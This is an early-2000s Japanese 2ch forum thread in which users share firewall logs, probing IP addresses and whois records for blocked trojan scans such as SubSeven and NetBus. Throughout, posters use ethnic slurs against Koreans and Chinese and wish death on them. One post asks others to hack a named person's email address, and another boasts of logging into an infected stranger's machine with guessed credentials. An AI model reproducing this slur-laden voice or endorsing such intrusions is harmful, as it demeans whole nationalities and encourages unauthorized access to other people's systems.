526 :名無しさん@お腹いっぱい。 :02/10/11 23:48
>>525
TransScoutトロイの木馬のデフォルト遮断。
Host : 146.245.2.221
Location : Brooklyn NY 11210
Network : Brooklyn College BROOKLYN-B
NetHandle: NET-146-245-0-0-1
Parent: NET-146-0-0-0-0
NetType: Direct Assignment
NameServer: OMNI.BROOKLYN.CUNY.EDU
NameServer: CUNIXD.CC.COLUMBIA.EDU
NameServer: BLACK-ICE.CC.VT.EDU
TechHandle: DB1529-ARIN
TechName: Best, David
TechPhone: +1-718-951-5861
TechEmail: david@brooklyn.cuny.edu

こいつ、僕の所にもきました!
どうにかして!!ヽ(`Д´)ノ

ブルックリン大学て…踏み台??



527 :名無しさん@お腹いっぱい。:02/10/12 00:04
米国ブルックリン大??

OrgName: Brooklyn College
OrgID: BROOKL

NetRange: 146.245.0.0 - 146.245.255.255
CIDR: 146.245.0.0/16
NetName: BROOKLYN-B
NetHandle: NET-146-245-0-0-1
Parent: NET-146-0-0-0-0
NetType: Direct Assignment
NameServer: OMNI.BROOKLYN.CUNY.EDU
NameServer: NS1-AUTH.SPRINTLINK.NET
NameServer: NS2-AUTH.SPRINTLINK.NET
NameServer: NS3-AUTH.SPRINTLINK.NET
NameServer: CUNIXD.CC.COLUMBIA.EDU
NameServer: BLACK-ICE.CC.VT.EDU
Comment:
RegDate: 1991-03-06
Updated: 1996-01-18

TechHandle: DB1529-ARIN
TechName: Best, David
TechPhone: +1-718-951-5861
TechEmail: david@brooklyn.cuny.edu

# ARIN Whois database, last updated 2002-10-10 19:05
# Enter ? for additional hints on searching ARIN's Whois database

528 :名無しさん@お腹いっぱい。:02/10/12 00:40
>525
俺も

529 :名無しさん@お腹いっぱい。:02/10/12 03:53
うちは、最近韓からばっかし、しかも脳豚先生いわく「トロイの攻撃がありました」だって、
夏ごろは、エルサレムとか、ばらえちーに飛んでて、今日はどこからかな?なんて楽しみに逆引きしてたのに。。。

最近、IPアドレスだけで「あ、またチョソからだよ。どうせPC房あたりからだろ?」ってしらべる前に見当がつくようになっちまった。。。

最近、3日間ぶっとーしでPC房でネット対戦ゲームやってたヤシが、マシンの前で息絶えてるのが店員によって見つけられたなんてやってたしな。。。

やること、ほかにないのかい?と、チョソに小一時間ほど。。。

鬱氏。


530 :VBS.LoveLetterなら完璧だったんだけどね(藁:02/10/12 11:04
CPE014090212191.cpe.net.cable.rogers.com <こいつNetBusウゼェ

Registrant:
Rogers Communications Inc. (ROGERS-DOM)
45 ESNA PARK DR.
MARKHAM, ON L3R 1C9
CA

Domain Name: ROGERS.COM

Administrative Contact:
Administrative, Domain (AD2981-ORG) domadmin@RCI.ROGERS.COM
Rogers Shared Services - IT
45 Esna Park Drive
Markham, ON L3R 1C9
CANADA
(905)513-5047
Fax- - (905)513-5012

531 :名無しさん@お腹いっぱい。:02/10/12 18:19
たったいま、ソウルからトロイさんが
おくられてきました。
いらんので、門前払いいたしました。


532 :名無しさん@お腹いっぱい。:02/10/12 23:13
最近、ほんとにチョソから、いらないお届け物おおいよなー(藁

受け付けで、お引き取りいただいてるけど知らないあいだに、
お届け物もらってイタイ目にあってるヤシいるんだろうな・・・・

お届け物に成功しる確率高いから片っ端からお届け物送りつけてんだろうね。

みんな、押売りには気をつけよーぜ。

なんつってな・・・

533 :名無しさん@お腹いっぱい。:02/10/12 23:49
>>532
そんなあなたに
http://pc.2ch.net/test/read.cgi/sec/1034431538/

このスレのチョソ限定版ともいえるスレ

534 :名無しさん@お腹いっぱい。:02/10/12 23:50
■■■■■■■■■■■■終了■■■■■■■■■■■■

535 :名無しさん@お腹いっぱい。:02/10/13 08:46
525-528はスイープっぽいね…

536 :これどこの国?:02/10/13 09:24
日付: 2002/10/09 時刻: 0:49:27
規則「Backdoor/SubSeven トロイの木馬のデフォルト遮断」が ***(***.***.**.*),27374 を遮断しました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは ***(***.***.**.*),27374
リモートアドレス、 サービスは 213.46.23.100,2842
プロセス名は N/A


537 :名無しさん@お腹いっぱい。:02/10/13 09:35
ファイアーウオールのログを見ると。これまで、ほとんどアタック(NET Bious、PING、Traceout等)
を受けていなかったのですが、最近(9月下旬くらいから)多数のアタックを受けているようです。
どのような理由が考えられるでしょうか?また対策はあるのでしょうか?知ってる人教えて
ください。

538 :名無しさん@お腹いっぱい。:02/10/13 11:25
>>537
俺も同じ状況です。

539 :名無しさん@お腹いっぱい。:02/10/13 11:26
536=538

540 :名無しさん@お腹いっぱい。:02/10/13 11:40
またUSAからトロイの木馬が来たなぁ・・・

541 :名無しさん@お腹いっぱい。:02/10/13 11:44
>>539
538なのですけどどういう意味ですか?
俺も536に書いてあることと同じことが起きているのですか?
ちなみに536と538は同一人物ではありません。


542 :名無しさん@お腹いっぱい。:02/10/13 13:21
そういや漏れがまだアナログのテレホだったころ
PFWやルーターなんて使ってなかったわけだがwindowsのフォルダ内に
「いたずらしてごめんなさい001」ってフォルダが999まで作られてたなぁ・・・
ロースペックPCだったんで消すのも一苦労。
っていうかアナログの超低速回線になんの恨みがあるのやら。

543 :名無しさん@お腹いっぱい。:02/10/13 13:22
ってこれは日本人の仕業だよなぁ・・・スレ違いスマソ・・・

544 :名無しさん@お腹いっぱい。:02/10/13 18:57
>>542
http://pc.2ch.net/test/read.cgi/sec/1018874433/

ハッキングでもなんでもないし

545 :名無しさん@お腹いっぱい。:02/10/13 20:18
61.32.92.74
Registrant: DACOM Corp.
Country: KR
Country: KR

546 :名無しさん@お腹いっぱい。:02/10/13 20:22
211.182.2.3
Registrant: KRNIC
Address: Korea Network Information Center
Country: KR
Host Master (hostmaster@nic.or.kr)
11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,
Seoul, Korea, 137-857
Phone: +82-2-2186-4500
Fax: +82-2-2186-4496

547 :名無しさん@お腹いっぱい。:02/10/17 01:41
SAVVIS Communications Corporation
ってなんだ。この会社何してんだろ。

548 :名無しさん@お腹いっぱい。:02/10/25 03:09
ザンビアzmキタ━━━━━(゚∀゚)━━━━━!!!!

549 :名無しさん@お腹いっぱい。:02/10/25 18:19
age

550 :名無しさん@お腹いっぱい。:02/10/25 21:09
おとなの玩具激安販売!
なんとピンクローター300円から♪
マニアック商品などその他いろいろあります!
http://www.king-one.com

551 :名無しさん@お腹いっぱい。:02/10/25 22:40
うちも、お隣の国からが多いなぁ。
Apacheのログ見てるとって話だけどね。
国内からの場合は2日様子見て治まらないようだとプロバイダに通報してる。



552 :名無しさん@お腹いっぱい。:02/10/27 03:25
1ブラジル
2フランス
3スペイン
ちなみに日本は26位だ

553 :名無しさん@お腹いっぱい。:02/10/27 06:10
イスラエルからきた。さっきはカナダ。

554 :名無しさん@お腹いっぱい。:02/10/27 20:09
>>537-538
これと関係が?自分もまだ詳しくないのでアレだが。
http://pc.2ch.net/test/read.cgi/sec/1033726535/

555 :名無しさん@お腹いっぱい。:02/10/27 22:23
今日はドイツからか・・・

556 :名無しさん@お腹いっぱい。:02/10/28 13:52
なんか、Port137たたかれまくりだなぁ。
面倒だからどこからかなんて確認してないけど・・。

余談だが、知人の住んでるマンションはネット対応うたってた。
ある日、ウイルスに感染したらしいというので確認に行くことになった。
試しに接続すると、ノーd反応しまくり、ネットワークコンピュータ開くとご近所さん
のパソコンまる見え。いいんだろうか・・。(汁


557 :名無しさん@お腹いっぱい。:02/11/02 02:18
cs81219.pp.htv.fi

これフィンランドでいいの?

558 :キタ━━(゚∀゚)━━ !!!!!:02/11/02 11:01

TCP Connection from

Orgnization ID : ORG108636
Org Name : KOREA TELECOM GURO NODE
State : SEOUL
Address : 1660 shinrim8dong kwanakkoo
Zip Code : 151-018

ポート3290ってなに?

559 :名無しさん@お腹いっぱい。:02/11/03 00:13
172.164.51.233と134.177.115.21と61.83.215.253からPing Attack
202.105.226.184からTraceroute
今週のログ。

560 :名無しさん@お腹いっぱい。:02/11/03 00:27
http://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=Test+Page+for+the+Apache+Web+Server&lr=
次の標的はこいつらだ

561 :名無しさん@お腹いっぱい。:02/11/03 00:28
自鯖立ててりゃ普通にアタックは来る。
別段珍しくもないよ。

562 :名無しさん@お腹いっぱい。:02/11/03 21:13
(´ι _`  ) アッソ

563 :名無しさん@お腹いっぱい。:02/11/14 05:49
IEハックの韓国野郎。
218.49.118.13
211.215.127.177 w

564 :☆☆☆☆☆:02/11/14 06:11
http://alink3.uic.to/user/ranran2.html

565 :名無しさん@お腹いっぱい。:02/11/18 01:09
毎日毎日二、三時間で200回近くきやがってコンチクショー

566 :名無しさん@お腹いっぱい。:02/11/20 17:27
ヰ棟準
194.226.124.116 ウザ

567 :名無しさん@お腹いっぱい。:02/11/20 17:31
chauron@do6.enjoy.ne.jp
ハッキングよろ!!!

568 :名無しさん@お腹いっぱい。:02/11/20 17:42
>>558

3290 caps-lm CAPS LOGISTICS TOOLKIT - LM
以後調べろ
ttp://www.iana.org/assignments/port-numbers

569 :名無しさん@お腹いっぱい。:02/11/20 17:46
>>567
やってもいいけど理由くらい書きませう

570 :名無しさん@お腹いっぱい。:02/11/20 18:27
>>569

知ったかぶりで自分がハッカーだとかほざいてるから。


571 :名無しさん@お腹いっぱい。:02/11/20 18:28
てか依頼は禁止なのね。
やっぱいいや。

572 :名無しさん@お腹いっぱい。:02/11/20 21:06
>>570
おめでたい野郎だね。
fusianasanしてからでかいことほざけよwww

573 :名無しさん@お腹いっぱい。:02/11/20 21:12
570は現実にハカーが存在することを知らない糞ガキですな
とりあえずふしあなしてごらんよ。楽しいことがあるからさ♪

574 :名無しさん@お腹いっぱい。:02/11/30 01:14
つまんねえな

575 :名無しさん@お腹いっぱい。:02/11/30 16:17
inetnum: 24.0.0.0 - 24.255.255.255
netname: IANA-NETBLOCK-24
address: see http://www.iana.org.
e-mail: nobody@apnic.net

トロイの木馬できた。
なに?IANAって?怪しい団体??


576 :名無しさん@お腹いっぱい。:02/11/30 16:19
>>575 氏んでくれ。

577 :名無しさん@お腹いっぱい。:02/12/05 01:52
>>575
やばいよ、その団体は。。。

578 :名無しさん@お腹いっぱい。:02/12/10 20:49
211.0.251.140

579 :名無しさん@お腹いっぱい。:02/12/21 13:31
うち、事情があってFTP空けてあるんだけど、国内の某社からアクセスしてくる
香具師見つけたんだよね。
Web見つけたのでログ添付して現在何の目的なのか解答請求中。
解答来るかなぁ?(w

580 :_:02/12/21 17:58
 国内でスよ。私はくラックされたサイト無告知でリンク変えたら
 やっぱりクラックした連中 何処に居ても「名○し」というハンドルの
 ヤツ、怒りまくってた (笑
 

581 :名無しさん@お腹いっぱい。:02/12/29 03:35
203.248.228.7
CodeRedに感染してた上の香具師に、Telnetで接続しにいったら
あっけなく接続出来たyo。User/Passも分かり易すぎだったが、
さすがに数日置いといたら、User/Passは変更したみたい。
でもTelnetポートは開いたまま。
これだから半島の香具師は...。

582 :名無しさん@お腹いっぱい。:02/12/31 18:06
61.175.7.16
62.29.17.129

たったいまなんかやりきてる連中。上は中国っぽいけど下は...?
だれよあんたたち。

583 :名無しさん@お腹いっぱい。:03/01/02 14:24
61.248.249.169
初めてitalkポートを叩かれた記念age

584 :名無しさん@お腹いっぱい。:03/01/05 01:50
アドレス 61.107.139.95 からの不正侵入の試みを規則 NetBus トロイの木馬のデフォルト遮断 によって検出しました。
アドレス 211.58.217.251 からの不正侵入の試みを規則 Back Orifice 2000 トロイの木馬のデフォルト遮断 によって検出しました。
アドレス 24.217.136.50 からの不正侵入の試みを規則 NetBus トロイの木馬のデフォルト遮断 によって検出しました。
ここ数ヶ月、毎日韓国からくる。氏ねや

585 :名無しさん@お腹いっぱい。:03/01/05 02:20
take-555@nifty.com

sss

586 :名無しさん@お腹いっぱい。:03/01/05 17:52
12.211.90.10

いまさらWincrashてのもなんだかな。
まあ白人はみんな新でくれ。

587 :名無しさん@お腹いっぱい。:03/01/05 21:08
61.104.140.157
姦国でも冬厨が冬休み最後の日をNetBusで楽しんでいるようです

588 :名無しさん@お腹いっぱい。:03/01/05 22:32
NetBIOSやらFTPやらSunRPCやら445やらなにやらのポートへIPアドレスを
変えて(偽装?)一定周期で集中的にアタックしにくるシナチ君がやたらと
来てるなぁと思ったんだけど活動再開したの?

ttps://www.netsecurity.ne.jp/article/1/1731.html

589 :名無しさん@お腹いっぱい。:03/01/06 10:49
おろしや国酔夢譚 62.118.53.22

590 :名無しさん@お腹いっぱい。:03/01/06 15:28
>>588
会社のサーバのログみたら不正アクセスが凄かったです。うちの場合は1433と445が一番多いく内訳はトップが中国、次点に韓国。3位はドイツとアメリカだったけれど、9割方韓国と中国で占められていました。
勿論全部ファイアーウォールで遮断されていたけれど、サンプル数は先月の10倍くらいに増えてます。

591 :名無しさん@お腹いっぱい。:03/01/07 17:54
中韓のヤシって新学期はじまったの?

592 :名無しさん@お腹いっぱい。:03/01/08 05:04
211.109.47.220 ←このIP(韓国)から
トロイの木馬をしかけようとしてきて
Norton Internet Securityでブロックした。
(最後に受けた攻撃 03/01/08 3:34)

593 :名無しさん@お腹いっぱい。:03/01/08 14:11
ゴミバケツぐらいで騒ぐな

594 :名無しさん@お腹いっぱい。:03/01/08 17:21
IPを晒して喜んでいる馬鹿ねらー達。  
http://www.amiva.com/an/vote001/tvote.cgi?event=001&show=com


595 :山崎渉:03/01/15 15:44
(^^)

596 :名無しさん@お腹いっぱい。:03/01/29 07:05
ルーマニアからくるよ。。。なんで?

597 :名無しさん@お腹いっぱい。:03/01/29 07:22
http://homepage3.nifty.com/digikei/ten.html

598 :名無しさん@お腹いっぱい。:03/01/29 09:10
漏れ唯一の攻撃は韓国からだったなあ。
ルータ通してから、ファイア・ウォールの必要性がなくなったような。

599 :名無しさん@お腹いっぱい。:03/01/31 11:48
漏れんとこは厨国がダントツ。 まじうざい。
次いで姦国、台湾、イタリア、米国。

>>596
うちにきたルーマニアの客。
141.85.254.78(me.mecatronica.pub.ro)

600 :名無しさん@お腹いっぱい。:03/01/31 11:49
そして600。

601 :名無しさん@お腹いっぱい。:03/02/03 04:35
インドのボンベイからわざわざご苦労なことですなあ。
FTPで何を盗もうとしたのかしらん。
203.192.196.156

602 :名無しさん@お腹いっぱい。:03/02/07 00:55
57.66.6.117
今日、攻撃されますた。
どっからきたのか調べるにはどうしたらいいんですか?

603 :名無しさん@お腹いっぱい。:03/02/07 01:13
>>602
どっから来たのか調べる前に攻撃かどうか確認しろ

604 :602:03/02/07 01:28
”Sokets de Trois”とセキュリティ警告が出ました。
これは攻撃ではないんでしょうか、すみません
初心者板のほうがいいですかね・・。

605 :56543:03/02/07 01:44
中国

606 :56543:03/02/07 01:45
なんかこのところ全体的に減りました

607 :602:03/02/07 02:57
すみませんでした、過去ログ読みました。
country: FR でした。

608 :もも:03/02/07 09:09
此方も中国おおいですね。
誰かギャフントいわせて下さい,あの国は南京大虐殺捏造してふんだくり
ODAでむしりとりまだ懲りずです。
犯罪者送り込み,国ぐるみで今度は サイバーテロ仕掛ける
日本の優秀なとこ見せてやって下さい。
ちょうむかっく。

609 :bloom:03/02/07 09:37
http://www.zdnet.co.jp/news/0302/06/nj00_olacle.html

610 :名無しさん@お腹いっぱい。:03/02/08 22:16
皆すごい、攻撃受けてるんだ。
俺ぜんーんぜん無いよ
何でかな???
ルーターも有るし、ファイアヤーウオールも入れてあるのに


611 :名無しさん@お腹いっぱい。:03/02/22 04:02
近々シナ人撲滅委員会設立します

612 :名無しさん@お腹いっぱい。:03/02/27 08:57
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.247.0
b. [ネットワーク名] AT-LINKNET
f. [組織名] 株式会社リンク・コミュニカティブ・アドクリエイターズ
g. [Organization] Link, Incorporated
m. [運用責任者] GO004JP
n. [技術連絡担当者] YI1082JP
p. [ネームサーバ] databook.atworks.co.jp
p. [ネームサーバ] ns.idc.ad.jp
y. [通知アドレス] jpnic-db@idc.ad.jp
[割当年月日] 2001/05/08
[返却年月日]
[最終更新] 2001/05/09 11:54:59 (JST)
tanaka@idc.ad.jp

これ日本だろ、どこだれ

おしえてくれーーーーー

613 :名無しさん@お腹いっぱい。:03/02/27 09:25
>>612氏ね

614 :名無しさん@お腹いっぱい。:03/02/27 12:39
規則 ICKiller トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ (203.122.1.118、 netbios-ns(137))

615 :名無しさん@お腹いっぱい。:03/02/28 04:32
こんな時間にポルトガルから来た藁

616 :名無しさん@お腹いっぱい。:03/03/01 23:55
567、勝手な事言わんといてくれへんかな??
俺のダチのアド勝手に公開すんな。
こいつはそんなん言うてへんし、そんなこと言う奴ちゃうし。
頼むんじゃなくて自分でやれば??>>567

617 :名無しさん@お腹いっぱい。:03/03/02 00:15
すいません、金曜日にうちの会社のメールServerを落としたのはおいらです。
反省してます、ごめんなさい。

618 :c7w565@mx2.fctv.ne.jp:03/03/02 19:30
ばーか

619 :名無しさん@お腹いっぱい。:03/03/27 07:04
OrgName: Hurricane Electric
OrgID: HURC
Address: 3433 Rockett Drive
City: Fremont
StateProv: CA
PostalCode: 94538
Country: US

NetRange: 216.218.128.0 - 216.218.255.255
CIDR: 216.218.128.0/17
NetName: HURRICANE-1
NetHandle: NET-216-218-128-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.HE.NET
NameServer: NS2.HE.NET
NameServer: NS3.HE.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-08-30
Updated: 2000-02-23

TechHandle: ZH17-ARIN
TechName: Hurricane Electric
TechPhone: +1-510-580-4100
TechEmail: hostmaster@he.net

変なのキタ━━━━━━(゚∀゚)━━━━━━!!!!!

620 :山崎渉:03/04/17 12:26
(^^)

621 :山崎渉:03/04/20 06:11
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

622 :名無しさん@お腹いっぱい。:03/05/07 21:52
almost 中獄、韓酷、




623 :名無しさん@お腹いっぱい。:03/05/17 00:46
217.42.9.248

イギリスから…BackDoor.SubSeven トロイの木馬だってさ。
ノートン先生がブロックしてくれますた。

624 :名無しさん@お腹いっぱい。:03/05/17 01:09
>>622
うちの場合は、中国・韓国・オーストラリアからのアタックが多いね。

625 :名無しさん@お腹いっぱい。:03/05/17 09:35
24.85.13.217
カナダのカルガリーから・・・BackDoor.SubSeven トロイの木馬


626 : :03/05/17 19:18
韓国、オーストラリア

627 :名無しさん@お腹いっぱい。:03/05/18 21:50
218.235.30.199
inetnum: 218.235.30.0 - 218.235.30.255
netname: HANANET-CATV-BUKBUSO-KR
descr: Hanaro Telecom Inc.
descr: 1445-3 Seocho-Dong Seocho-Ku
descr: SEOUL
descr: 137-728
country: KR
admin-c: IS7251-KR
tech-c: SH8574-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
mnt-by: MNT-KRNIC-AP
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
changed: hostmaster@nic.or.kr 20030414
source: KRNIC

NetBus送りつけてきやがった。糞チョソ氏ね!!

628 :山崎渉:03/05/22 02:03
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

629 :名無しさん@お腹いっぱい。:03/05/24 06:36
24.76.240.144
h24-76-240-144.vs.shawcable.net

OrgName: Shaw Fiberlink
OrgID: FBCA
Address: Suite xxx, xxx - xxx Ave SW
City: Calgary
StateProv: AB
PostalCode: T2P 4L4
Country: CA

NetRange: 24.76.0.0 - 24.79.255.255
CIDR: 24.76.0.0/14
NetName: FIBERLINK-CABLE-2BLK
NetHandle: NET-24-76-0-0-1
Parent: NET-24-0-0-0-0
NetType: Direct Allocation
NameServer: NS2SO.CG.SHAWCABLE.NET
NameServer: NS1SO.CG.SHAWCABLE.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2000-12-15
Updated: 2002-08-12

TechHandle: ZS178-ARIN
TechName: Shaw High-Speed Internet
TechPhone: +1-xxx-xxx-xxxx
TechEmail: xxxxxxxxxxxxxx

backdoor/sub sevenをブロックしますた。Canadaの糞ガキ逝ってよし

630 :名無しさん@お腹いっぱい。:03/05/28 15:26
81.224.62.17
Amsterdamから
BackDoor/SubSeven トロイの木馬

631 :名無しさん@お腹いっぱい。:03/06/07 07:49
よろこんでる だけですか?

632 :_:03/06/07 07:53
http://homepage.mac.com/hiroyuki43/jaz09.html

633 :名無しさん@お腹いっぱい。:03/06/07 21:18
>>626
漏れも同じです

634 :とり:03/06/07 21:27
(スパイウェアだけど)
中国からの「CnsMin」
SpyBotを何回使っても消えないよう

635 :名無しさん@お腹いっぱい。:03/06/07 21:52
211.108.213.22

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

NetRange: 210.0.0.0 - 211.255.255.255
CIDR: 210.0.0.0/7
NetName: APNIC-CIDR-BLK2
NetHandle: NET-210-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS.RIPE.NET
NameServer: RS2.ARIN.NET
NameServer: DNS1.TELSTRA.NET


NetBusがきました。オーストラリア。またきてね♪



636 :名無しさん@お腹いっぱい。:03/06/08 00:45
アメリカ、韓国、オーストラリア、中国がおおいな。

637 :とり:03/06/08 13:49
中国
アメリカ
韓国

638 :名無しさん@お腹いっぱい。:03/06/08 15:54
アタックされるってことは、わがPCがトロイに感染していると
いうことになるのかな・・・?

639 :名無しさん@お腹いっぱい。:03/06/11 11:17
hinet.netがやたらしつこいんだが
たまにニュージーランド、トルコ、アルゼンチンからも来るのは漏れんとこだけ?

>634
消し方解説してるページとか出てくるからさっさとググりな

640 :名無しさん@お腹いっぱい。:03/06/11 21:38
アフリカとかからこないかな?
南極とか

641 :名無しさん@お腹いっぱい。:03/06/11 23:56
http://www.nhk.or.jp/nankyoku/
>>640 はいどうぞ

642 :名無しさん@お腹いっぱい。:03/06/12 00:02
糞スレあげんなヴァカ

643 :名無しさん@お腹いっぱい。:03/06/12 06:10
昔日本のどこかの馬鹿大学から来たな、昔のやつでもう探すのが面倒だしスレ違いですな。

644 :名無しさん@お腹いっぱい。:03/06/18 07:18
200.232.245.120

ウルグアイからBackDoor/SubSeven トロイの木馬



645 :名無しさん@お腹いっぱい。:03/06/18 17:08
韓国
米国
台湾
次点で中国

646 :名無しさん@お腹いっぱい。:03/06/19 11:58
ttp://www.mainichi.co.jp/news/flash/shakai/20030619k0000e040031001c.html

2位のイスラエルって何よ。狙ってる。

647 :名無しさん@お腹いっぱい。:03/06/19 12:12
糞スレにつきsage進行おながいします

648 :名無しさん@お腹いっぱい。:03/06/20 14:42
>>646

中韓を抜くとこうなるのかぁ(w

649 :名無しさん@お腹いっぱい。:03/06/21 09:30
これ見るとイスラエルのピークは去年みたいだ
ttp://www.cyberpolice.go.jp/important/20030619_100451.html
しかしpdfとはいえデカい

650 :名無しさん@お腹いっぱい。:03/06/30 22:57


651 :名無しさん@お腹いっぱい。:03/07/09 12:29
たとえば、携帯番号みたいなもので連番というか
見つけやすいIPがあるんじゃないかな

652 :山崎 渉:03/07/15 11:08

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

653 :名無しさん@お腹いっぱい。:03/07/17 02:24
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] jpnic-sec@web.ad.jp
[割当年月日] 2001/01/31
[返却年月日]
[最終更新] 2001/02/02 10:39:04 (JST)
saitoh@web.ad.jp


654 :名無しさん@お腹いっぱい。:03/07/19 08:30
2003/07/19 08:20:52

66.222.180.99:1641 (amih4lyy45pj.ab.hsia.telus.net)
Sub 7 Trojan Scan

Sub 7 Trojan Scan (1641/27374)
トロイの木馬「Sub 7」です。BackDoor-G2.svr.21 とも呼ばれています。


655 :名無しさん@お腹いっぱい。:03/07/23 21:53
米のソルト・レイク・シティーから来たよw

656 :名無しさん@お腹いっぱい。:03/07/25 03:56
inetnum: 219.168.0.0 - 219.215.255.255
netname: BBTECH
descr: Japan nation-wide Network of SOFTBANK BB CORP
descr: Tokyo, Japan
country: JP
admin-c: SA127-AP
tech-c: SA127-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-BBTECH
changed: stsuruma@softbank.co.jp 20020319
changed: hostmaster@apnic.net 20020412
changed: hm-changed@apnic.net 20030616
status: ALLOCATED PORTABLE
source: APNIC

role: SoftbankBB ABUSE
address: 24-1, Nihonbashi Hakozaki-Cho ,Chuo-Ku ,Tokyo
country: JP
phone: +81-0570-919-820
e-mail: hostmaster@bbtec.net
trouble: Please send spam report,virus alart
trouble: or any other abuse report
trouble: to abuse@bbtec.net
trouble: Any other Information, Notice,
trouble: Please send to hostmaster@bbtec.net
admin-c: TT123-AP
tech-c: ST222-AP
nic-hdl: SA127-AP
notify: admin@bbtec.net
mnt-by: MAINT-JP-BBTECH
changed: stsuruma@softbank.co.jp 20030613
source: APNIC

657 :名無しさん@お腹いっぱい。:03/07/26 13:23
アメリカ経由ってだけでほとんどry

658 :ぼるじょあ ◆yBEncckFOU :03/08/02 04:56
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

659 :山崎 渉:03/08/15 23:32
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

660 :名無しさん@お腹いっぱい。:03/08/16 02:25
うちは中国多かった。
ひょっとして国策?

661 :名無しさん@お腹いっぱい。:03/08/16 02:54
うちもクラックするつもりでアタックしてるのかはわかりませんが不正アクセス多いです。
やっぱりアメリカ、中国、韓国、台湾が多いですね。この不正アクセスログみてると不安に
なります。個人情報が流失してなければいいのですが、、、

662 :名無しさん@お腹いっぱい。:03/08/16 09:07
192.168.1.1
このひと誰か教えてくだしー

663 :名無しさん@お腹いっぱい。:03/08/16 09:43
>>662
aho?


664 :名無しさん@お腹いっぱい。:03/08/16 10:06
>>662
あっ、俺だ。

665 :名無しさん@お腹いっぱい。:03/08/16 11:43
>>663
pulu

666 :名無しさん@お腹いっぱい。:03/08/16 11:58
なんで中国が多いの?
あそこパソコンってあるの?

667 :名無しさん@お腹いっぱい。:03/08/16 11:58
OCNから凄まじい勢いでポート135にアタック来てる
もう全47都道府県からすべて来てるかも

668 :  :03/08/16 13:03
みんな!!違法取立てバカの闇金、八島総業が名前と電番変えて必死だぞ!!
こいつらが名前と電番を変えていろいろなところで暗躍している!!
重要な証拠をつかんだ!!!イタ電だ!!!                      
何とか興業、総業はみんなこいつらだ!!
八島総業=須賀興業=大谷興業=朝妻興業だ!!
住所にはいつも必ず1-7-1を使っている!!
イタ電だ!!!!
↓↓詳しくはこちら!!↓↓
【闇金融】違法取立て馬鹿の自称八島総業を叩くスレ!!
http://www.megabbs.com/cgi-bin/readres.cgi?bo=rage&vi=1059058002


669 :名無しさん@お腹いっぱい。:03/08/16 13:48
>>666
いっぱいあるよ
韓国、北より圧倒的に多い
セキュリティの弱いパソコンも

670 :名無しさん@お腹いっぱい。:03/08/16 15:19
だれか
ブラクラください!!!

671 :名無しさん@お腹いっぱい。:03/08/16 17:04

inetnum: 211.52.0.0 - 211.63.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 20000216
changed: hostmaster@apnic.net 20010606
status: ALLOCATED PORTABLE
source: APNIC


672 :名無しさん@お腹いっぱい。:03/08/17 21:44
69.1.17.112
誰かアメリカの糟野郎を頃してくれ

673 :名無しさん@お腹いっぱい。:03/08/19 07:39
>>635
漏れの場合もMilton野郎が
連日こりもせずに来てます。
Code Red、Smurf、Trace outと
いろいろやってくれてます( ´,_ゝ`)プッ

674 :(* ̄д ̄)y─┛〜〜:03/08/19 07:40
  _、_
( , ノ` )    いいと思うが・・・
  \,;  シュボッ
    (),
    |E|
http://homepage3.nifty.com/manko/

675 :名無しさん@お腹いっぱい。:03/08/19 08:07
なんだ厨国

676 :名無しさん@お腹いっぱい。:03/08/20 11:14
>>667
俺もOCNからかなり来ているw
基本的に田舎が主だけどね

問い合わせるとアタックじゃないと突き通す<OCN
微妙だ・・・・

677 :名無しさん@お腹いっぱい。:03/08/21 00:54
なぁ、、>>635とか。
xxNICってのは、NICだから。
特にAPNICってのは範囲広かったんじゃなかったっけ?

678 :名無しさん@お腹いっぱい。:03/08/22 21:25
66.118.174.12

OrgName: Sago Networks
OrgID: SAGO
Address: 4465 W. Gandy Blvd.
Address: Suite 800
City: Tampa
StateProv: FL
PostalCode: 33611
Country: US

NetRange: 66.118.128.0 - 66.118.191.255
CIDR: 66.118.128.0/18
NetName: SAGONET-IPV4-1
